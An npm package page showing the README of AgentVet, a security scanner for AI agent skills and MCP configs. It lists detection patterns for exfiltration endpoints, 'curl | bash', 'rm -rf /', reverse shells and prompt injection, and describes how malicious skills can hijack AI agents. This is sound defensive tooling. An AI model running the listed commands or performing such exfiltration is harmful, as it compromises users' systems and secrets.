npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@agentvet/cli

v0.8.0

Published

Security scanner for AI agent skills, configs, and MCP tools. Vet before you trust.

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

te2te2

Keywords

securityai-agentscannermcpskillsclawdbotclaude-codedevinsupply-chain

Readme

🛡️ AgentVet

Security scanner for AI agent skills, configs, and MCP tools. Vet before you trust.

License: MIT

Why AgentVet?

AI agents like Claude Code, Devin, Cursor, and Clawdbot are increasingly using external skills, plugins, and MCP tools. These files are often:

  • Unsigned — no way to verify authenticity
  • User-contributed — anyone can publish to skill marketplaces
  • Highly privileged — agents can execute code, access files, and make API calls

A single malicious skill can exfiltrate credentials, install backdoors, or hijack your agent's actions.

AgentVet scans these files before they can do damage.

Features

  • 🔍 Credential Detection — Finds hardcoded API keys, tokens, and secrets
  • 🌐 Suspicious URL Detection — Flags webhook.site, ngrok, pastebin, and other exfiltration endpoints
  • ⚠️ Dangerous Command Patterns — Detects rm -rf, curl | bash, eval(), and similar risks
  • 📁 Permission Analysis — Identifies overly permissive file access patterns
  • 🔐 File Permission Checks — Warns when sensitive files have insecure permissions
  • 🦠 YARA Integration — Advanced threat detection with AI agent-specific YARA rules
  • 📦 Dependency Scanning — npm audit and pip-audit integration for vulnerability detection
  • 🧠 LLM Intent Analysis — AI-powered detection of malicious instructions in agent configs

Installation

npm install -g @agentvet/cli

Or run directly with npx:

npx @agentvet/cli scan ./my-skills

Usage

Scan a local directory

agentvet scan ./skills/my-skill

Scan a GitHub repository

agentvet scan https://github.com/user/agent-config

Output formats

# Human-readable (default)
agentvet scan ./skills

# JSON output for CI/CD
agentvet scan ./skills --format json --output report.json

# Quiet mode (summary only)
agentvet scan ./skills --quiet

Dependency scanning

AgentVet scans for vulnerable dependencies using npm audit and pip-audit:

# Dependency scanning enabled by default
agentvet scan ./my-project

# Disable dependency scanning
agentvet scan ./my-project --no-deps

Supports:

  • npm: Scans package-lock.json for known vulnerabilities
  • pip: Scans requirements.txt using pip-audit (requires pip install pip-audit)

LLM intent analysis

Use AI to analyze agent instructions for malicious intent:

# Enable LLM analysis (requires API key)
export OPENAI_API_KEY=sk-...
agentvet scan ./skills --llm

# Or use Anthropic
export ANTHROPIC_API_KEY=sk-ant-...
agentvet scan ./skills --llm --llm-provider anthropic

# Specify model
agentvet scan ./skills --llm --llm-model gpt-4o

Detects:

  • Prompt injection — Attempts to override system instructions
  • Hidden commands — Secret instructions triggered by conditions
  • Data exfiltration — Instructions to leak data externally
  • Deceptive behavior — Instructions to hide actions or lie

YARA scanning

AgentVet includes built-in YARA rules for AI agent threats:

# YARA enabled by default
agentvet scan ./skills

# Disable YARA scanning
agentvet scan ./skills --no-yara

# Use custom YARA rules
agentvet scan ./skills --yara-rules ./my-rules

YARA works in two modes:

  • yara-cli: Uses the native yara command (fastest, requires yara installed)
  • js-fallback: Pure JavaScript implementation (works everywhere, no dependencies)

Ignore files

Create .agentvetignore in your project root to exclude files:

# Ignore test fixtures
test/fixtures/

# Ignore documentation with example patterns
docs/*.md

# Ignore backup files
*.bak

# Ignore specific security tool that contains patterns
scripts/security-scanner.js

Supports gitignore-style patterns:

  • * matches anything except /
  • ** matches everything including /
  • /pattern anchors to root
  • pattern/ matches directories

Exit codes

| Code | Meaning | |------|---------| | 0 | No issues found (or warnings only) | | 1 | Critical or high severity issues found |

What It Scans

| Target | Description | |--------|-------------| | SKILL.md / skill.md | Clawdbot skill definitions | | AGENTS.md | Agent instruction files | | mcp.json / mcp-config.json | MCP tool configurations | | claude_desktop_config.json | Claude Desktop MCP config | | cline_mcp_settings.json | Cline MCP settings | | .cursor-mcp.json | Cursor MCP config | | *.js, *.ts, *.py | Scripts referenced by skills | | .env, config.json | Configuration files |

Detection Rules

🔴 Critical

  • Hardcoded AWS keys, API tokens, private keys
  • Known malware patterns (YARA-based)
  • Data exfiltration URLs (webhook.site, requestbin, etc.)
  • MCP: Unrestricted command execution (bash, sh)
  • MCP: Shell injection risks (-c flag patterns)
  • MCP: Hardcoded credentials in tool configs
  • MCP: Root filesystem access

🟡 Warning

  • Dangerous shell commands (rm -rf /, curl | bash)
  • Eval/exec patterns in scripts
  • Overly broad file access permissions
  • Insecure file permissions on credential files
  • MCP: Tunnel services (ngrok, localtunnel)
  • MCP: Raw IP address endpoints
  • MCP: Unrestricted filesystem/network access
  • MCP: Environment variable exposure

🔵 Info

  • Unusual network endpoints
  • Deprecated API usage

🦠 YARA Rules (AI Agent Threats)

  • Prompt Injection — System override attempts, jailbreak patterns
  • Agent Hijacking — Hidden instructions, behavior modification
  • Credential Exfiltration — Env leaks, file theft to external endpoints
  • Backdoors — Reverse shells, crypto miners, remote access
  • Supply Chain — Package hijacking, postinstall attacks
  • Obfuscation — Base64/hex encoded payloads
  • Privilege Escalation — sudo abuse, setuid patterns

CI/CD Integration

GitHub Actions (Recommended)

Use the official AgentVet action:

name: AgentVet Security Scan
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      
      - name: Run AgentVet
        uses: taku-tez/agentvet@v1
        with:
          path: '.'
          severity: 'warning'
          fail-on-critical: 'true'

Manual Setup

name: AgentVet Security Scan
on: [push, pull_request]

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run AgentVet
        run: npx agentvet scan . --format json --output agentvet-report.json
      - name: Upload Report
        uses: actions/upload-artifact@v4
        with:
          name: agentvet-report
          path: agentvet-report.json

Pre-commit hook

# .git/hooks/pre-commit
npx agentvet scan . --quiet || exit 1

Contributing

Contributions welcome! See CONTRIBUTING.md for guidelines.

Adding Detection Rules

Rules are defined in src/rules/. Each rule exports:

module.exports = {
  id: 'credential-aws-key',
  severity: 'critical',
  description: 'Hardcoded AWS access key',
  pattern: /AKIA[0-9A-Z]{16}/g,
  recommendation: 'Use environment variables or a secrets manager'
};

License

MIT © AgentVet Contributors

Permission Manifest & Trust Chain

AgentVet supports Permission Manifests - declarative files that specify what permissions a skill requires. This enables:

  • Transparency: Users know exactly what a skill will access before installing
  • Verification: AgentVet can compare declared vs actual permissions
  • Trust Chains: Track who created, audited, and verified a skill

Manifest Commands

# Generate manifest from detected usage
agentvet manifest init ./my-skill

# Validate manifest schema
agentvet manifest validate ./my-skill

# Verify skill matches its manifest (CI-friendly)
agentvet manifest verify ./my-skill

# Show trust chain
agentvet manifest trust ./my-skill

# Add audit entry (after code review)
agentvet manifest audit ./my-skill --auditor "org:mycompany" --notes "Reviewed 2026-01-31"

# Show example manifest
agentvet manifest example

Manifest Format

{
  "version": "1.0",
  "name": "my-skill",
  "permissions": {
    "exec": ["git", "npm"],
    "network": ["api.github.com", "*.openai.com"],
    "files": ["read:./", "write:./output"],
    "secrets": ["GITHUB_TOKEN"],
    "elevated": false
  },
  "trust": {
    "author": "github:username",
    "audits": [
      {
        "auditor": "org:acme-corp",
        "date": "2026-01-31",
        "contentHash": "sha256:...",
        "scope": "full"
      }
    ],
    "verified": true
  }
}

Trust Levels

| Level | Description | |-------|-------------| | Self | Self-declared, no external audit | | Community | Audited by community member | | Organization | Audited by trusted organization | | Registry | Verified by official registry (ClawdHub) | | Official | Official skill from OpenClaw team |